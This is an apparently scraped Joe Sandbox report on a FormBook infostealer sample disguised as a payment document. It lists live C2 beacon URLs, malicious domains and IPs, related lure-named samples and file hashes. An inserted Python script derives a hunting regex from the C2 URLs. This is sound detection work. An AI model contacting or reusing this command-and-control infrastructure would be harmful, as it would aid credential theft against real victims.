http://www.deadshoy.tech/0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf | 0% | Avira URL Cloud | safe
https://autoitscript.comVP/ | 0% | Avira URL Cloud | safe
http://www.telepzow.fit/oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf | 100% | Avira URL Cloud | phishing
https://google.comVISITOR_INFO1_LIVEv20 | 0% | Avira URL Cloud | safe
https://google.comVISITOR_PRIVACY_METADATAv20ue | 0% | Avira URL Cloud | safe
http://www.dnft.immo/yeky/ | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.y6h6kn.top | 103.23.149.28 | true | true | | unknown
94950.bodis.com | 199.59.243.227 | true | false | | high
www.deadshoy.tech | 199.59.243.227 | true | true | | unknown
www.telepzow.fit | 172.67.155.214 | true | true | | unknown
thesnusgang.fun | 84.32.84.32 | true | true | | unknown
www.thesnusgang.fun | unknown | unknown | false | | unknown
www.dnft.immo | unknown | unknown | false | | unknown
srtb.msn.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.telepzow.fit/oizn/ | true | Avira URL Cloud: phishing | unknown
http://www.y6h6kn.top/jv64/?BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvf | true | Avira URL Cloud: safe | unknown
http://www.thesnusgang.fun/z4qr/ | true | Avira URL Cloud: safe | unknown
http://www.dnft.immo/yeky/?BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvf | true | Avira URL Cloud: safe | unknown
http://www.thesnusgang.fun/z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf | true | Avira URL Cloud: safe | unknown
http://www.telepzow.fit/oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf | true | Avira URL Cloud: phishing | unknown
http://www.deadshoy.tech/0sq9/ | true | Avira URL Cloud: safe | unknown
http://www.deadshoy.tech/0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf | true | Avira URL Cloud: safe | unknown
http://www.dnft.immo/yeky/ | true | Avira URL Cloud: safe | unknown
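The contacted URLs above share one shape across five unrelated domains: a four-character path token, a long blob under a query parameter named BTV4RR_, and the same Tr=F0udvf value on every host. The script below is an added example, not part of this report or of Joe Sandbox: it parses the URLs exactly as listed in the table and derives a hunting regex from only the fields the hosts share. The regex is specific to the traffic in this report and makes no claim about the FormBook protocol in general; the function and variable names are the example's own.

```python
"""Pivot over the C2 URLs in this report and derive a hunting regex from their shared fields.

Added example, not Joe Sandbox code. OBSERVED_URLS is copied from the report's
contacted-URL table and is the only input the example uses.
"""
import re
from urllib.parse import urlsplit

OBSERVED_URLS = [
    "http://www.telepzow.fit/oizn/",
    "http://www.y6h6kn.top/jv64/?BTV4RR_=0rgj4Y9sgnjazUN/4YnNawpmVeS/0BjNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7w9E5vaK255EpQhtC5dNFByAd90Z0uMBeXk0=&Tr=F0udvf",
    "http://www.thesnusgang.fun/z4qr/",
    "http://www.dnft.immo/yeky/?BTV4RR_=7P22LBHaa1jf6nBK2o2gS6XOG6oCOldtUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadAxG5YrQIOX9iVafYKH1JxvTLehj3THGuTlQ=&Tr=F0udvf",
    "http://www.thesnusgang.fun/z4qr/?BTV4RR_=1ZZgvIaiKHhduep9Gr9CVWvOgHRqyUfEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jvQKbXYzZtls87cfJZx+dUoFHR2K38281rgo=&Tr=F0udvf",
    "http://www.telepzow.fit/oizn/?BTV4RR_=uQjrwkUUEo9A4dlTBtchalk/X9854Zb0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrRCQBiEGwcQ2q95PqYDbv0Ge51W4VvJEvInw=&Tr=F0udvf",
    "http://www.deadshoy.tech/0sq9/",
    "http://www.deadshoy.tech/0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf",
    "http://www.dnft.immo/yeky/",
]


def split_query(query):
    """Split 'k=v&k2=v2' without decoding. urllib.parse.parse_qs would turn '+' into a
    space and corrupt the base64-looking blob, so the values are kept byte-for-byte."""
    out = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        out[name] = value
    return out


def parse_beacon(url):
    """Host, first path segment and raw query parameters of one URL."""
    p = urlsplit(url)
    segs = [s for s in p.path.split("/") if s]
    return {"host": p.hostname, "path_token": segs[0] if segs else "", "params": split_query(p.query)}


def summarize(urls):
    """host -> {'path_token', 'params'} merged over every URL seen for that host."""
    hosts = {}
    for b in map(parse_beacon, urls):
        entry = hosts.setdefault(b["host"], {"path_token": b["path_token"], "params": {}})
        entry["params"].update(b["params"])
    return hosts


def shared_fields(summary):
    """Parameter names every host sends, and the subset whose value is identical on every host."""
    with_query = [e["params"] for e in summary.values() if e["params"]]
    if not with_query:
        return set(), {}
    names = set.intersection(*(set(p) for p in with_query))
    values = {}
    for n in names:
        seen = {p[n] for p in with_query}
        if len(seen) == 1:
            values[n] = seen.pop()
    return names, values


def build_hunt_regex(summary, names, values):
    """Regex over path+query built only from what the observed URLs share:
    path-token length range, shared parameter names in observed order, and fixed values."""
    lengths = {len(e["path_token"]) for e in summary.values() if e["path_token"]}
    token = "[a-z0-9]{%d,%d}" % (min(lengths), max(lengths))
    order = next((list(p) for p in (e["params"] for e in summary.values()) if p), [])
    params = [re.escape(n) + "=" + (re.escape(values[n]) if n in values else "[^&]+")
              for n in order if n in names]
    return re.compile(r"^/" + token + r"/\?" + "&".join(params) + "$")


def hunt(url, rx):
    """True if the URL's path and query match the derived pattern."""
    p = urlsplit(url)
    target = p.path + ("?" + p.query if p.query else "")
    return rx.search(target) is not None


if __name__ == "__main__":
    summary = summarize(OBSERVED_URLS)
    names, values = shared_fields(summary)
    rx = build_hunt_regex(summary, names, values)
    print("hosts:", sorted(summary))
    print("shared parameter names:", sorted(names))
    print("shared fixed values:", values)
    print("hunt regex:", rx.pattern)
```

On this report's URLs the derived pattern is ^/[a-z0-9]{4,4}/\?BTV4RR_=[^&]+&Tr=F0udvf$, which matches the five query-carrying beacons and none of the bare path URLs. The fixed Tr value is the field to pivot on in proxy logs; the blob under BTV4RR_ differs per host, so it is an IOC for this sample only.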
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.deadshoy.tech | gXhpelxbquSwSp.exe, 0000000E.00000002.12536862831.0000000002FCE000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr | false | | high
https://duckduckgo.com/ac/?q= | xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr | false | | high
https://fpt.live.com/session_id=f79511e86c1f4ab69498b2fb7f2923a5&CustomerId=33e01921-4d64-4f8c-a055- | xwizard.exe, 0000000F.00000002.12535879368.0000000000A22000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr | false | | high
https://ac.ecosia.org?q= | X0a-0531.15.dr | false | | high
https://google.comVISITOR_PRIVACY_METADATA/ | xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr | false | | high
https://google.comVISITOR_INFO1_LIVE/ | xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://autoitscript.compb_rtb_ev_partv20 | xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.ecosia.org/newtab/ | X0a-0531.15.dr | false | | high
https://autoitscript.comVPv20 | xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://autoitscript.compb_rtb_ev_part/ | xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.0000000006B1C000.00000004.80000000.00040000.00000000.sdmp, gXhpelxbquSwSp.exe, 0000000E.00000002.12546623184.000000000698A000.00000004.80000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.00000000056FA000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12537476710.000000000588C000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12540120301.0000000007830000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://autoitscript.comVP/ | xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://google.comVISITOR_PRIVACY_METADATAv20ue | xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | xwizard.exe, 0000000F.00000002.12540443456.0000000007AF7000.00000004.00000020.00020000.00000000.sdmp, X0a-0531.15.dr | false | | high
https://google.comVISITOR_INFO1_LIVEv20 | xwizard.exe, 0000000F.00000003.11844411815.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 0000000F.00000002.12535879368.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | X0a-0531.15.dr | false | | high
https://gemini.google.com/app?q= | X0a-0531.15.dr | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
103.23.149.28 | www.y6h6kn.top | unknown | 131349 | DIGINET-AS-VNDigitaltelecomminicationservicejointstock | true
172.67.155.214 | www.telepzow.fit | United States | 13335 | CLOUDFLARENETUS | true
199.59.243.227 | 94950.bodis.com | United States | 395082 | BODIS-NJUS | false
84.32.84.32 | thesnusgang.fun | Lithuania | 33922 | NTT-LT-ASLT | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1574653
Start date and time: 2024-12-13 13:16:21 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 12s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 32
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Payment Copy #190922-001.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@7/4
Cookbook Comments:
• Found application associated with file extension: .exe
• Processes excluded from analysis (whitelisted): dllhost.exe, audiodg.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, backgroundTaskHost.exe
• IPs excluded from analysis (whitelisted): 204.79.197.203, 23.44.201.36, 4.175.87.197, 20.150.78.196, 20.190.177.149
• Domains excluded from analysis (whitelisted): www.bing.com, assets.msn.com, chrome.cloudflare-dns.com, client.wns.windows.com, slscr.update.microsoft.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cxcs.microsoft.net, aefd.nelreports.net, weathermapdata.blob.core.windows.net, x1.c.lencr.org, login.live.com, th.bing.com, c.pki.goog
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• VT rate limit hit for: Payment Copy #190922-001.exe
Time | Type | Description
07:18:33 | API Interceptor | 507903x Sleep call for process: xwizard.exe modified
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    172.67.155.214https://smail_blackfriday__bigusamail_2024-f084sf.storage.googleapis.com/SSSNNNXXXYYYPPPWWRRR_______________FGSD4065J1F%2BSSSCCRRBBBRR_________2.......HTMGet hashmaliciousPhisherBrowse
                                                      199.59.243.227new.exeGet hashmaliciousFormBookBrowse
                                                      • www.vavada-official.buzz/emhd/
                                                      PO 1202495088.exeGet hashmaliciousFormBookBrowse
                                                      • www.sob.rip/tp8k/
                                                      SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                      • ww1.hbohbomax.com/
                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • www.deadshoy.tech/0sq9/
                                                      PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                      • ww7.przvgke.biz/cairvr?usid=18&utid=28672493914
                                                      Need Price Order No.17084 PARLOK.exeGet hashmaliciousFormBookBrowse
                                                      • www.solar-quotes.click/ubu8/
                                                      DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                      • www.whisperart.net/27s6/
                                                      QUOTATON-37839993.exeGet hashmaliciousFormBookBrowse
                                                      • www.sfantulandrei.info/wvsm/
                                                      lgkWBwqY15.exeGet hashmaliciousFormBookBrowse
                                                      • www.bcg.services/5onp/
                                                      New quotation request.exeGet hashmaliciousFormBookBrowse
                                                      • www.bcg.services/5onp/
                                                      84.32.84.32SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • www.activateya.life/f95q/
                                                      ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exeGet hashmaliciousFormBookBrowse
                                                      • www.thesnusgang.fun/z4qr/
                                                      DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                      • www.samundri.online/3ifu/
                                                      purchase order.exeGet hashmaliciousFormBookBrowse
                                                      • www.techmiseajour.net/jytl/
                                                      SRT68.exeGet hashmaliciousFormBookBrowse
                                                      • www.appsolucao.shop/qize/
                                                      Pp7OXMFwqhXKx5Y.exeGet hashmaliciousFormBookBrowse
                                                      • www.sido247.pro/073p/
                                                      SW_5724.exeGet hashmaliciousFormBookBrowse
                                                      • www.samundri.online/3ifu/
                                                      attached invoice.exeGet hashmaliciousFormBookBrowse
                                                      • www.techmiseajour.net/jytl/
                                                      attached order.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.techmiseajour.net/jytl/
                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                      • www.samundri.online/5kax/
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
94950.bodis.com | new.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | PO 1202495088.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | SHIPPING DOC.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Purchase order MIPO2425110032.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | PI916810.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | SALES ORDER875.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Invoice & Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Invoice Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
94950.bodis.com | Invoice Packing list For Sea Shipment.exe | malicious | FormBook | 199.59.243.227
www.telepzow.fit | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 104.21.64.208
www.y6h6kn.top | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 162.251.95.62
www.deadshoy.tech | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 199.59.243.227
Match | Associated Sample Name / URL | Detection | Threat Name | Context
NTT-LT-ASLT | SHIPPING DOCUMENTS_PDF.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | http://www.thehorizondispatch.com | malicious | Unknown | 84.32.84.239
NTT-LT-ASLT | DHL_734825510.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | purchase order.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | Opportunity Offering Pure Home Improvement Unique Guest Post Websites A... (107Ko).msg | malicious | Unknown | 84.32.84.93
NTT-LT-ASLT | iGxCM2I5u9.exe | malicious | Flesh Stealer | 84.32.84.100
NTT-LT-ASLT | iGxCM2I5u9.exe | malicious | Unknown | 84.32.84.122
NTT-LT-ASLT | SRT68.exe | malicious | FormBook | 84.32.84.32
NTT-LT-ASLT | http://editableslides.co | malicious | HTMLPhisher, TechSupportScam | 84.32.84.208
CLOUDFLARENETUS | SC_TR11670000_pdf.exe | malicious | FormBook | 104.21.74.79
CLOUDFLARENETUS | Quotation Request-349849.exe | malicious | FormBook | 172.67.137.47
CLOUDFLARENETUS | http://home45insurance.blogspot.com | malicious | Unknown | 104.20.2.69
CLOUDFLARENETUS | http://home45insurance.blogspot.com | malicious | Unknown | 104.20.3.69
CLOUDFLARENETUS | duschno.exe | malicious | CredGrabber, Meduza Stealer | 172.67.74.152
CLOUDFLARENETUS | Bloxflip Predictor.exe | malicious | Njrat | 162.159.137.232
CLOUDFLARENETUS | file.exe | malicious | Amadey, LummaC Stealer, Xmrig | 172.67.139.78
CLOUDFLARENETUS | file.exe | malicious | Unknown | 172.67.192.146
CLOUDFLARENETUS | https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156 | malicious | TechSupportScam | 1.1.1.1
DIGINET-AS-VNDigitaltelecomminicationservicejointstock | http://103.23.144.53:15221/32A7E157.moe | malicious | Unknown | 103.23.144.53
BODIS-NJUS | new.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | PO 1202495088.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | PURCHASE REQUIRED DETAILS 000487958790903403.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 199.59.243.227
BODIS-NJUS | Need Price Order No.17084 PARLOK.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | http://doctifyblog.com | malicious | Unknown | 199.59.243.227
BODIS-NJUS | DHL_734825510.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | QUOTATON-37839993.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | lgkWBwqY15.exe | malicious | FormBook | 199.59.243.227
BODIS-NJUS | New quotation request.exe | malicious | FormBook | 199.59.243.227
                                                      No context
                                                      No context
                                                      Process:C:\Users\user\Desktop\Payment Copy #190922-001.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):287232
                                                      Entropy (8bit):7.993766009454213
                                                      Encrypted:true
                                                      SSDEEP:6144:6C+fRuxSJlsJ21eOGekDZhjvJAJ/JJAL19op8/TLh2AJ9trtg:U5sROGekHzJA3yvCwTLhjJ9Xg
                                                      MD5:F8F104B847CE08C8D2DE8DE58CCBE942
                                                      SHA1:A74D19F99A4A1A196BE0F5BFBCE5F6FC153FAC30
                                                      SHA-256:431F60B2EB8C660E1224D2BE82EB3CBFAE4F7B824FE7B2A44DFA67C9D2EEC2A2
                                                      SHA-512:CA2787E5199B713E27F5716FFFF70D12433C71EAF60A275415CB9AF90143A6F331DE5D2C1AF3A1158167B6719E5B103D4A085C447199D9C0E76B834D47454CD3
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:}..OY2E0@VE6..DZ.T0AG0K2.Z2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT.AG0E-.T2.9.w.7..e.?=Ca7B$U=;_eS%8+Y$z&?w&E/gY%...ae]+2 .]WN~WT0AG0KKNS.xP#.xV7.y:0.*...qR(.(.j%Q.@..hP&.b"Q'gR".DVE6PZDZ..0A.1J2..b.0DVE6PZD.WV1JF;K2.^2E0DVE6PZ.NWT0QG0KRKZ2EpDVU6PZFZWR0AG0K2O\2E0DVE6P:@ZWV0AG0K2MZr.0DFE6@ZDZWD0AW0K2OZ2U0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6~.!"#T0A..O2OJ2E0.RE6@ZDZWT0AG0K2OZ2e0D6E6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6P
                                                      Process:C:\Windows\SysWOW64\xwizard.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3037001, page size 2048, file counter 5, database pages 57, cookie 0x25, schema 4, UTF-8, version-valid-for 5
                                                      Category:dropped
                                                      Size (bytes):120832
                                                      Entropy (8bit):1.2217911962382482
                                                      Encrypted:false
                                                      SSDEEP:192:U24ZY9FIH9pgXn0T+MbMHBddqqZKWAWF66iVumVe:U2x9Fa9pgn1BrqqZKWh4HVumVe
                                                      MD5:71A1F5964AE7880CEAA0C5BDEC3B7296
                                                      SHA1:EB1A527D05C1346DF353D3B7CD02D778A11CC3D5
                                                      SHA-256:8204A4BBEF749CAABB7FD7260E0EAFD1DCC05EAC8787AE0782F8909DE3CE07C4
                                                      SHA-512:F0DD94C28CA0AB24064AF17EE1753D67E9411F809D9114338B492CD619C428B7AB27E976FC44A35A3D0D76DB640BD5A0F1ABFF64F0DA7168DD259BF0910DA593
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:SQLite format 3......@ .......9...........%......................................................WI...........1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      Process:C:\Users\user\Desktop\Payment Copy #190922-001.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):287232
                                                      Entropy (8bit):7.993766009454213
                                                      Encrypted:true
                                                      SSDEEP:6144:6C+fRuxSJlsJ21eOGekDZhjvJAJ/JJAL19op8/TLh2AJ9trtg:U5sROGekHzJA3yvCwTLhjJ9Xg
                                                      MD5:F8F104B847CE08C8D2DE8DE58CCBE942
                                                      SHA1:A74D19F99A4A1A196BE0F5BFBCE5F6FC153FAC30
                                                      SHA-256:431F60B2EB8C660E1224D2BE82EB3CBFAE4F7B824FE7B2A44DFA67C9D2EEC2A2
                                                      SHA-512:CA2787E5199B713E27F5716FFFF70D12433C71EAF60A275415CB9AF90143A6F331DE5D2C1AF3A1158167B6719E5B103D4A085C447199D9C0E76B834D47454CD3
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:}..OY2E0@VE6..DZ.T0AG0K2.Z2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT.AG0E-.T2.9.w.7..e.?=Ca7B$U=;_eS%8+Y$z&?w&E/gY%...ae]+2 .]WN~WT0AG0KKNS.xP#.xV7.y:0.*...qR(.(.j%Q.@..hP&.b"Q'gR".DVE6PZDZ..0A.1J2..b.0DVE6PZD.WV1JF;K2.^2E0DVE6PZ.NWT0QG0KRKZ2EpDVU6PZFZWR0AG0K2O\2E0DVE6P:@ZWV0AG0K2MZr.0DFE6@ZDZWD0AW0K2OZ2U0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6~.!"#T0A..O2OJ2E0.RE6@ZDZWT0AG0K2OZ2e0D6E6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6PZDZWT0AG0K2OZ2E0DVE6P
                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.183063563195928
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:Payment Copy #190922-001.exe
                                                      File size:1'201'664 bytes
                                                      MD5:6ad492e20a37cb8ae67231fa9059df17
                                                      SHA1:822ee5217bf832a320095b45a65c75d1f147bde8
                                                      SHA256:3c22db2dc305a5605630a009337d6dcf8ed36c132a5269b3fd6146a175813f67
                                                      SHA512:5e2f04f75b6b9c61a435f94fbb36ede8e5e09f3b1d5974c6fb8bfb0e7c6147cd2b1224ab060c3b048a70651b8fe86466e4fe03421bf7a88ddcb4228db93c3461
                                                      SSDEEP:24576:qu6J33O0c+JY5UZ+XC0kGso6FaHH0gQCb3igteIOtOZNFcWY:cu0c++OCvkGs9FaHH0gQCDtvOt+Y
